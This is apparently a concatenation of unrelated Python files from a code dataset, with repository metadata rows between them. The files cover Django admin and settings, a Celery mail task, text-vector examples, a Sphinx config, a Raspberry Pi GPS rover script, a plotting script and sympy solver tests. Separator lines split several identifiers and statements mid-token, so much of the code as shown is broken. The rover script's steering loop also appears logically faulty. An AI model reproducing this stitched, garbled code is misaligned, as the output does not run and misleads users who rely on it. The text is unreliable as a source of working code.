self._blob = ctypes_struct_or_union
return self
@classmethod
def _to_ctypes(cls, value):
return value._blob
def __repr__(self, c_name=None):
return CTypesData.__repr__(self, c_name or self._get_c_name(' &'))
class CTypesBackend(object):
PRIMITIVE_TYPES = {
'char': ctypes.c_char,
'short': ctypes.c_short,
'int': ctypes.c_int,
'long': ctypes.c_long,
'long long': ctypes.c_longlong,
'signed char': ctypes.c_byte,
'unsigned char': ctypes.c_ubyte,
'unsigned short': ctypes.c_ushort,
'unsigned int': ctypes.c_uint,
'unsigned long': ctypes.c_ulong,
        'unsigned long long': ctypes.c_ulonglong,
|
restless/mezzanine-slider-revolution
|
slider_revolution/admin.py
|
Python
|
mit
| 1,323
| 0.002268
|
from __future__ import unicode_literals
from django.contrib import admin
from django.core import urlresolvers
from mezzanine.core.admin import TabularDynamicInlineAdmin, StackedDynamicInlineAdmin
from .models import Slider, SlideCaption, Slide
class SlideInline(TabularDynamicInlineAdmin):
    template = "slider_revolution/admin/slide_dynamic_inline_tabular.html"
model = Slide
extra = 1
def changeform_link(self, instance):
if instance.id:
changeform_url = urlresolvers.reverse('admin:slider_revolution_slide_change', args=(instance.id,))
return '<a href="{}">Details</a>'.format(changeform_url)
else:
addform_url = urlresolvers.reverse('admin:slider_revolution_slide_add')
return '<a href="{}">Add</a>'.format(addform_url)
changeform_link.allow_tags = True
changeform_link.short_description = 'Slide'
fields = ("image_thumb", "changeform_link")
readonly_fields = ("image_thumb", "changeform_link",)
class SliderAdmin(admin.ModelAdmin):
inlines = (SlideInline,)
class SlideCaptionInline(StackedDynamicInlineAdmin):
model = SlideCaption
class SlideAdmin(admin.ModelAdmin):
inlines = (SlideCaptionInline,)
admin.site.register(Slider, SliderAdmin)
admin.site.register(Slide, SlideAdmin)
|
yiplee/ltc-huobi
|
ltc_huobi/settings.py
|
Python
|
mit
| 3,262
| 0.001226
|
"""
Django settings for ltc_huobi project.
Generated by 'django-admin startproject' using Django 1.11.2.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
import ltc
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '6t$e^bg18g6u)((0gvfb(dnfh5y&=0_lz&5*-6hrs=mc&u1j#t'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['localhost']
# Application definition
INSTALLED_APPS = [
'ltc.apps.LtcConfig',
    'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'ltc_huobi.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'ltc_huobi.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
PROJECT_ROOT = os.path.normpath(os.path.dirname(__file__))
STATIC_ROOT = os.path.join(PROJECT_ROOT, 'static')
STATIC_URL = '/static/'
|
Urumasi/Flask-Bones
|
app/tasks.py
|
Python
|
mit
| 874
| 0
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from flask import render_template
from app.extensions import celery, mail
from app.data import db
from celery.signals import task_postrun
from flask_mail imp
|
ort Message
@celery.task
def send_registration_email(user, token):
msg = Message(
'User Registration',
sender='admin@flask-bones.com',
recipients=[user.email]
)
msg.body = render_template(
'mail/registration.mail',
user=user,
token=token
)
mail.send(msg)
@task_postrun.connect
def close_session(*args, **kwargs):
# Flask
|
SQLAlchemy will automatically create new sessions for you from
    # a scoped session factory. Given that we are maintaining the same app
    # context, this ensures tasks have a fresh session (e.g. session errors
    # won't propagate across tasks).
db.session.remove()
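# Usage sketch (illustrative, not part of the original module): from a view or
# CLI you would queue the task with Celery's standard API, e.g.
#   send_registration_email.delay(user, token)
# and close_session() then runs after each task via the task_postrun signal.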
|
drvinceknight/sklDj
|
sklDj/implementations/__init__.py
|
Python
|
mit
| 59
| 0
|
from implementation import *
from implement
|
ations i
|
mport *
|
curiburn/pso2_grind_optimizer
|
py/main.py
|
Python
|
gpl-3.0
| 2,887
| 0.011304
|
import sys
import argparse
import time
sys.path.append('./bin/moabc')
import optimizer
# Argument handling
# Initialize the parser
parser = argparse.ArgumentParser(description='This script optimizes bayesian network graph structure by MOABC')
# Grind success-rate table
parser.add_argument("infile_pt", type=str)
# Cost of a single grind attempt
parser.add_argument("-pg","--pricegrind", type=int)
# Number of grind-simulator runs
parser.add_argument("-na","--num_average", type=int, default=100)
# Output destination for results
# No trailing slash
# OK: test, ./test
# NG: test/, ./test/
parser.add_argument("out_dir", type=str)
# Save intermediate results during learning
group_sp = parser.add_mutually_exclusive_group()
group_sp.add_argument('-sp', '--saveprogress', action='store_true')
group_sp.add_argument('-n-sp', '--no-saveprogress', action='store_false')
parser.set_defaults(saveprogress=False)
# Number of parallel processes
parser.add_argument("-np","--num_proc", type=int, default=1)
# Whether to produce image output
# Not possible over e.g. an ssh login, so pass False there
group_wi = parser.add_mutually_exclusive_group()
group_wi.add_argument('-wi', '--withimage', action='store_true')
group_wi.add_argument('-n-wi', '--no-with_image', action='store_false')
parser.set_defaults(withimage=True)
# Number of bees
parser.add_argument('-me', '--m_employed', type=int, help='number of employed bees', default=40)
parser.add_argument('-mo', '--m_onlooker',type=int, help='number of onlooker bees', default=40)
parser.add_argument('-li', '--limit',type=int, help='scout-bee threshold', default=3)
# Number of loops
parser.add_argument('-n', type=int, help='number of loops', default=50)
#ALPHA
parser.add_argument('-a', '--alpha', type=float, help='value of ALPHA', default=1)
# Parse the variables
# The approach below apparently yields a dict
args = vars(parser.parse_args())
print("parsed arguments from argparse\n%s\n" % str(args))
# Output directory
out_dir = args['out_dir']
# Save results while running
save_progress = args['saveprogress']
# Create the instance
infile_pt = args['infile_pt']
input_price_grind = args['pricegrind']
op = optimizer.MOABC(infile_pt, input_price_grind)
# Set the hyperparameters
op.M_employed = args['m_employed']
op.M_onlooker = args['m_onlooker']
op.LIMIT = args['limit']
op.N = arg
|
s['n']
op.weight_h = args['alpha']
op.proc = args['num_proc']
op.num_average = args['num_average']
# Apply the parameters
op.gen.calculate_weights()
# Learning phase
d
|
ir_save_progress = ''
if save_progress:
dir_save_progress = out_dir
start = time.time()
op.learn(out_dirname=dir_save_progress)
end = time.time()
# Output the elapsed time
str_time = "time: " + "{0}".format(end - start)
print(str_time)
f = open('%s/time.log' % out_dir, 'w')
f.writelines(str_time)
f.close()
# Output the learning results
op.save_result(out_dir, prefix='total', with_image=args['withimage'])
|
klinstifen/rpi.mar13
|
mar13.py
|
Python
|
lgpl-3.0
| 6,451
| 0.014106
|
#!/usr/bin/python
import serial
import RPi.GPIO as GPIO
import time
import math
from RPIO import PWM
import logging
from math import *
from hmc5883l import hmc5883l
import sys
import os
# -----------------------------------------
# ----- begin declare variables
# -----------------------------------------
# log filename
logfile = 'log.csv'
# waypoint filename
wpfile = "waypoints.txt"
# GPS serial port
serialport = serial.Serial("/dev/gps0", 115200)
# xbee serial port
#xbee = serial.Serial("/dev/gps0", 9600)
# compass adjustment
cAdjust = +2
# GPIO pins
goButton = 17
readyLED = 18
steering = 24
#throttle = 23
# GPS accuracy * 2
GPSaccuracy = 10
# -----------------------------------------
# ----- end declare variables
# -----------------------------------------
GPIO.setmode(GPIO.BCM)
GPIO.setup(readyLED,GPIO.OUT)
GPIO.setup(goButton,GPIO.IN)
# setup compass
#mydec = -13,25
compass = hmc5883l(gauss = 4.7, declination = (-7,13))
# read in waypoints
wps = []
wplist = open(wpfile,'r')
for line in wplist:
coord = line.split(",")
wps.append([float(coord[0]),float(coord[1])])
wplist.close()
# open logfile
f = open(logfile,'a')
# init steering / throttle
servo = PWM.Servo(pulse_incr_us=1)
servo.set_servo(steering,1500)
#servo.set_servo(throttle,1500)
def blinkLED(n):
# blink LED on/off n number of times
# LED is on/off for 0.5/0.2 seconds
i = 0
while i <= n:
GPIO.output(readyLED,1)
time.sleep(0.5)
GPIO.output(readyLED,0)
time.sleep(0.2)
i += 1
def getDegrees(dms,nw):
# convert GPS in dddmm.mmmm format to dd.dddd
if (int(dms[0:1]) != 0):
dms = str(0) + dms
D = int(dms[0:3])
M = float(dms[3:])
#S = float(dms[5:])
DD = D + float(M)/60 #+ float(S)/3600
if (nw == "S" or nw == "W"): DD *= -1
return float(DD)
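# Worked example for getDegrees (values illustrative): "4807.038" is first
# zero-padded to "04807.038", giving D=48, M=7.038, so DD = 48 + 7.038/60
# ~= 48.1173; with nw="S" or "W" the sign is flipped.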
def getLocation():
# read serial port and parse out GPS lat/long/compass/heading info
# return a list of found values
GPS = [0, 1, 2, 3, 4]
GPSFound = 0
while not GPSFound:
NMEAline = serialport.readline()
NMEAdata = NMEAline.spl
|
it(',')
if (NMEAdata[0] == "$GPRMC"):
# make sure we have GPS lock
if NMEAdata[2] == "V": continue
GPS[0] = round(getDegrees(NMEAdata[3],NMEAdata[4]),6) # lat
GPS[1] = NMEAdata[4] # n/s
GPS[2] = round(getDegrees(NMEAdata[5],NMEAdata[6]),6) # long
GPS[3]
|
= NMEAdata[6] # e/w
GPS[4] = NMEAdata[8] # heading
GPSFound = 1
return GPS
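# Example $GPRMC sentence (illustrative) and the resulting list:
# $GPRMC,123519,A,4807.038,N,01131.000,E,022.4,084.4,230394,003.1,W*6A
# -> GPS = [48.1173, 'N', 11.516667, 'E', '084.4']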
def getBearing(lat1, long1, lat2, long2):
long1, lat1, long2, lat2 = map(radians, [long1, lat1, long2, lat2])
dLon = long2 - long1
y = sin(dLon) * cos(lat2)
x = cos(lat1) * sin(lat2) \
- sin(lat1) * cos(lat2) * cos(dLon)
b = round(degrees(atan2(y, x)))
b = b + 360 if b < 0 else b
return b
def getDistance(lat1, long1, lat2, long2):
lat1, long1, lat2, long2 = map(radians, [lat1, long1, lat2, long2])
dlon = long2 - long1
dlat = lat2 - lat1
a = sin(dlat/2)**2 + cos(lat1) * cos(lat2) * sin(dlon/2)**2
c = 2 * asin(sqrt(a))
d = 3961 * c
d = round(d * 5280,6) # convert distance to feet
print ('Distance: ' + str(d))
return d
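# Rough sanity check for the two helpers above (approximate values):
# getBearing(48.0, 11.0, 48.1, 11.2)  -> ~53    (initial bearing, degrees)
# getDistance(48.0, 11.0, 48.1, 11.2) -> ~61000 (feet, about 11.5 miles)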
def changeDirection(course):
# change rc steering to match course angle
steerAng = (round(course / 3.5) * 50) + 1500
servo.set_servo(steering,steerAng)
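# Mapping examples (derived from the formula above): course 0 -> 1500us pulse
# (center), +35 -> 2000us (full one way), -35 -> 1000us (full the other way),
# in 50us steps per ~3.5 degrees of course error.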
def main():
GPIO.output(readyLED,1)
while True:
if (GPIO.input(goButton)):
# get ready
blinkLED(3)
# go
#servo.set_servo(throttle,1600)
# time of run
tor = str(time.strftime("%d%m%Y")) + str(time.strftime("%H%M%S"))
# set loop count
n = 0
for wp in wps:
wpLat = wp[0]
wpLong = wp[1]
distance = GPSaccuracy
while distance >= GPSaccuracy:
start = int(round(time.time() * 1000))
GPS = getLocation()
myLat = GPS[0]
myLong = GPS[2]
bearing = getBearing(myLat,myLong,wpLat,wpLong)
heading = compass.heading() + cAdjust
course = bearing - heading
while course > 0:
if (course >= 180):
course -= 360
if (course <= -180):
course +=360
# correct for max turn capability
if (course > 35):
course = 35
if (course < -35):
course = -35
changeDirection(course)
heading = compass.heading() + cAdjust
course = bearing - heading
# -----------------------
# ---- output to log
# -----------------------
end = int(round(time.time() * 1000))
lduration = (end - start)
# -----------------------
# --- output to xbee
# -----------------------
output = str(n) + ' || ' + str(myLat) + ' || ' + str(myLong) + ' || ' + \
str(wp) + ' || ' + str(bearing) + ' || ' + str(distance) + ' || ' + \
str(heading) + ' || ' + str(course) + ' || ' + str(lduration) + '\r'
#xbee.write(output)
# ---- header
# tor,loop,lat,long,waypoint,bearing,distance,heading,course,loop duration
                output = str(tor) + ',' + str(n) + ',' + str(myLat) + ',' + str(myLong) + ',' + \
                    str(wp) + ',' + str(bearing) + ',' + str(distance) + ',' + \
                    str(heading) + ',' + str(course) + ',' + str(lduration) + '\n'
f.write(output)
n += 1
distance = getDistance(myLat,myLong,wpLat,wpLong)
f.close()
# stop
#servo.set_servo(throttle,1500)
if __name__=="__main__":
main()
|
krishna11888/ai
|
third_party/pattern/examples/05-vector/01-document.py
|
Python
|
gpl-2.0
| 3,205
| 0.007488
|
import os, sys; sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", ".."))
import codecs
from pattern.vector import Document, PORTER, LEMMA
# A Document is a "bag-of-words" that splits a string into words and counts them.
# A list of words or dictionary of (word, count)-items can also be given.
# Words (or more generally "features") and their word count ("feature weights")
#
|
can be used to compare docu
|
ments. The word count in a document is normalized
# between 0.0-1.0 so that shorter documents can be compared to longer documents.
# Words can be stemmed or lemmatized before counting them.
# The purpose of stemming is to bring variant forms of a word together.
# For example, "conspiracy" and "conspired" are both stemmed to "conspir".
# Nowadays, lemmatization is usually preferred over stemming,
# e.g., "conspiracies" => "conspiracy", "conspired" => "conspire".
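# A tiny illustration of the effect (sketch; exact counts depend on the stemmer):
# Document("conspiracy conspired", stemmer=PORTER).words -> {'conspir': 2}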
s = """
The shuttle Discovery, already delayed three times by technical problems and bad weather,
was grounded again Friday, this time by a potentially dangerous gaseous hydrogen leak
in a vent line attached to the ship's external tank.
The Discovery was initially scheduled to make its 39th and final flight last Monday,
bearing fresh supplies and an intelligent robot for the International Space Station.
But complications delayed the flight from Monday to Friday,
when the hydrogen leak led NASA to conclude that the shuttle would not be ready to launch
before its flight window closed this Monday.
"""
# With threshold=1, only words that occur more than once are counted.
# With stopwords=False, words like "the", "and", "I", "is" are ignored.
document = Document(s, threshold=1, stopwords=False)
print document.words
print
# The /corpus folder contains texts mined from Wikipedia.
# Below is the mining script (we already executed it for you):
#import os, codecs
#from pattern.web import Wikipedia
#
#w = Wikipedia()
#for q in (
# "badger", "bear", "dog", "dolphin", "lion", "parakeet",
# "rabbit", "shark", "sparrow", "tiger", "wolf"):
# s = w.search(q, cached=True)
# s = s.plaintext()
# print os.path.join("corpus2", q+".txt")
# f = codecs.open(os.path.join("corpus2", q+".txt"), "w", encoding="utf-8")
# f.write(s)
# f.close()
# Loading a document from a text file:
f = os.path.join(os.path.dirname(__file__), "corpus", "wolf.txt")
s = codecs.open(f, encoding="utf-8").read()
document = Document(s, name="wolf", stemmer=PORTER)
print document
print document.keywords(top=10) # (weight, feature)-items.
print
# Same document, using lemmatization instead of stemming (slower):
document = Document(s, name="wolf", stemmer=LEMMA)
print document
print document.keywords(top=10)
print
# In summary, a document is a bag-of-words representation of a text.
# Bag-of-words means that the word order is discarded.
# The dictionary of words (features) and their normalized word count (weights)
# is also called the document vector:
document = Document("a black cat and a white cat", stopwords=True)
print document.words
print document.vector.features
for feature, weight in document.vector.items():
print feature, weight
# Document vectors can be bundled into a Model (next example).
|
redvox/Eliza
|
docs/conf.py
|
Python
|
apache-2.0
| 9,460
| 0.006237
|
# -*- coding: utf-8 -*-
#
# Core documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 12 12:49:48 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinxcontrib.autohttp.flask'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffixes as a list of strings:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Eliza'
copyright = u'2016, Jens Schaa'
author = u'Jens Schaa'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
sys.path.insert(0, os.path.abspath('../'))
sys.path.insert(0, os.path.abspath('../eliza'))
import version
version = '.'.join(str(x) for x in version.__version__)
# The full version, including alpha/beta/rc tags.
release = version
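# e.g. if version.__version__ is the tuple (1, 2, 3), both version and
# release become '1.2.3' (this assumes __version__ is an iterable of numbers).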
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name
|
of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = No
|
ne
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'Coredoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'Eliza.tex', u'Eliza Documentation',
u'Jens Schaa', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL address
|
ekaakurniawan/Bioinformatics-Tools
|
plot_conservation/plot_conservation.py
|
Python
|
gpl-2.0
| 2,539
| 0.002363
|
# Copyright (C) 2012 by Eka A. Kurniawan
# eka.a.kurniawan(ta)gmail(tod)com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; version 2 of the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# Tested on:
# - Python 2.7.3
# - NumPy 1.6.2
# - MatPlotLib 1.1.1
import numpy as np
import matplotlib.pyplot as plot
files = [['H1N1 - Avian - protein_conservation.txt', 'H1N1 - Avian'],
['H1N1 - Human - protein 1a_conservation.txt', 'H1N1 - Human 1'],
['H1N1 - Human - protein 1b_conservation.txt', 'H1N1 - Human 2'],
['H1N1 - Human - protein 2a_conservation.txt', 'H1N1 - Human 3'],
['H1N1 - Human - protein 2b_conservation.txt', 'H1N1 - Human 4'],
['H1N1 - Human - protein 3a_conservation.txt', 'H1N1 - Human 5'],
['H1N1 - Human - protein 3b_conservation.txt', 'H1N1 - Human 6'],
['H1N1 - Swine - protein_conservation.txt', 'H1N1 - Swine'],
['H3N2 - Avian - protein_conservation.txt', 'H3N2 - Avian'],
['H3N2 - Human - protein 1_conservation.txt', 'H3N2 - Human 1'],
['H3N2 - Human - protein 2_conservation.txt', 'H3N2 - Human 2'],
['H3N2 - Human - protein 3_conservation.txt', 'H3N2 - Human 3'],
['H3N2 - Swine - protein_conservation.txt', 'H3N2 - Swine'],
['H5N1 - Avian - protein_conservation.txt', 'H5N1 - Avian'],
['H5N1 - Human - protein_conservation.txt', 'H5N1 - Human'],
['H5N1 - Swine - protein_conservation.txt', 'H5N1 - Swine
|
']]
conservations = []
totalFile = len(files)
for file in
|
files:
inFile = open(file[0], 'r')
conservations.append(np.array(inFile.read().split(',')[:-1], \
dtype = np.float))
inFile.close()
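# Each *_conservation.txt appears to hold comma-separated scores with a
# trailing comma (hence the [:-1] above), e.g. "7.0,11.0,3.5," -> [7.0, 11.0, 3.5]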
plot.boxplot([np.asarray(cs) for cs in conservations])
plot.title('Conservation Box Plot of Different Viruses')
plot.ylabel('Score (0 to 11)')
plot.xticks(np.arange(totalFile + 1), [''] + [file[1] for file in files], \
rotation = -90)
plot.show()
|
pernici/sympy
|
sympy/solvers/tests/test_solvers.py
|
Python
|
bsd-3-clause
| 13,913
| 0.016172
|
from sympy import (Matrix, Symbol, solve, exp, log, cos, acos, Rational, Eq,
sqrt, oo, LambertW, pi, I, sin, asin, Function, diff, Derivative, symbols,
S, sympify, var, simplify, Integral, sstr, Wild, solve_linear, Interval,
And, Or, Lt, Gt, Assume, Q, re, im, expand, zoo)
from sympy.solvers import solve_linear_system, solve_linear_system_LU,dsolve,\
tsolve, solve_undetermined_coeffs
from sympy.solvers.solvers import guess_solve_strategy, GS_POLY, GS_POLY_CV_1, GS_POLY_CV_2,\
GS_TRANSCENDENTAL, GS_RATIONAL, GS_RATIONAL_CV_1
from sympy.utilities.pytest import XFAIL, raises
from sympy.abc import x
def NS(e, n=15, **options):
return sstr(sympify(e).evalf(n, **options), full_prec=True)
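# A quick illustration of the helper above: NS(pi, 5) -> '3.1416';
# full_prec=True keeps the full printed precision of the evaluated number.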
def test_swap_back():
# A solution comes back from solve even though it shouldn't be: f(x) is
# in the solution's Integral as the upper limit. When solve is fixed this
# test should be removed. For now, since there are ode's that come back
# with these sorts of solutions, the swap_back feature is performed in
# solve and tested here.
# This appears to be fixed - the equation is not solved.
x = Symbol('x')
f = Function('f')
raises(NotImplementedError, "solve(Eq(log(f(x)), Integral(x, (x, 1, f(x)))), f(x))")
def test_guess_poly():
"""
See solvers.guess_solve_strategy
"""
x, y, a = symbols('x,y,a')
# polynomial equations
assert guess_solve_strategy( S(4), x ) == GS_POLY
assert guess_solve_strategy( x, x ) == GS_POLY
assert guess_solve_strategy( x + a, x ) == GS_POLY
assert guess_solve_strategy( 2*x, x ) == GS_POLY
assert guess_solve_strategy( x + sqrt(2), x) == GS_POLY
assert guess_solve_strategy( x + 2**Rational(1,4), x) == GS_POLY
assert guess_solve_strategy( x**2 + 1, x ) == GS_POLY
assert guess_solve_strategy( x**2 - 1, x ) == GS_POLY
assert guess_solve_strategy( x*y + y, x ) == GS_POLY
assert guess_solve_strategy( x*exp(y) + y, x) == GS_POLY
assert guess_solve_strategy( (x - y**3)/(y**2*(1 - y**2)**(S(1)/2)), x) == GS_POLY
def test_guess_poly_cv():
x, y = symbols('x,y')
# polynomial equations via a change of variable
assert guess_solve_strategy( x**Rational(1,2) + 1, x ) == GS_POLY_CV_1
assert guess_solve_strategy( x**Rational(1,3) + x**Rational(1,2) + 1, x ) == GS_POLY_CV_1
assert guess_solve_strategy( 4*x*(1 - sqrt(x)), x ) == GS_POLY_CV_1
# polynomial equation multiplying both sides by x**n
assert guess_solve_strategy( x + 1/x + y, x ) == GS_POLY_CV_2
def test_guess_rational_cv():
# rational functions
x, y = symbols('x,y')
assert guess_solve_strategy( (x+1)/(x**2 + 2), x) == GS_RATIONAL
assert guess_solve_strategy( (x - y**3)/(y**2*(1 - y**2)**(S(1)/2)), y) == GS_RATIONAL_CV_1
# rational functions via the change of variable y -> x**n
assert guess_solve_strategy( (x**Rational(1,2) + 1)/(x**Rational(1,3) + x**Rational(1,2) + 1), x ) \
== GS_RA
|
TIONAL_CV_1
def test_guess_transcendental():
x, y, a, b = symbols('x,y,a,b')
#transcendental functions
assert guess_solve_strategy( exp(x) + 1, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy( 2*cos(x)-y, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy( exp(x) + exp(-x) - y, x ) == GS_TRANSCENDENTAL
assert guess_solve_strategy(3**x-10, x) == GS_TRANSCENDENTAL
assert guess_solve_strategy(-3**x+10, x) == GS_TRANSCENDENTAL
assert guess_solv
|
e_strategy(a*x**b-y, x) == GS_TRANSCENDENTAL
def test_solve_args():
x, y = symbols('x,y')
#implicit symbol to solve for
assert set(int(tmp) for tmp in solve(x**2-4)) == set([2,-2])
assert solve([x+y-3,x-y-5]) == {x: 4, y: -1}
#no symbol to solve for
assert solve(42) == []
assert solve([1,2]) == None
#multiple symbols
assert solve(x+y-3,[x,y]) == {x: [3 - y], y: [3 - x]}
#symbol is not a symbol or function
raises(TypeError, "solve(x**2-pi, pi)")
def test_solve_polynomial1():
x, y, a = symbols('x,y,a')
assert solve(3*x-2, x) == [Rational(2,3)]
assert solve(Eq(3*x, 2), x) == [Rational(2,3)]
assert solve(x**2-1, x) in [[-1, 1], [1, -1]]
assert solve(Eq(x**2, 1), x) in [[-1, 1], [1, -1]]
assert solve( x - y**3, x) == [y**3]
assert sorted(solve( x - y**3, y)) == sorted([
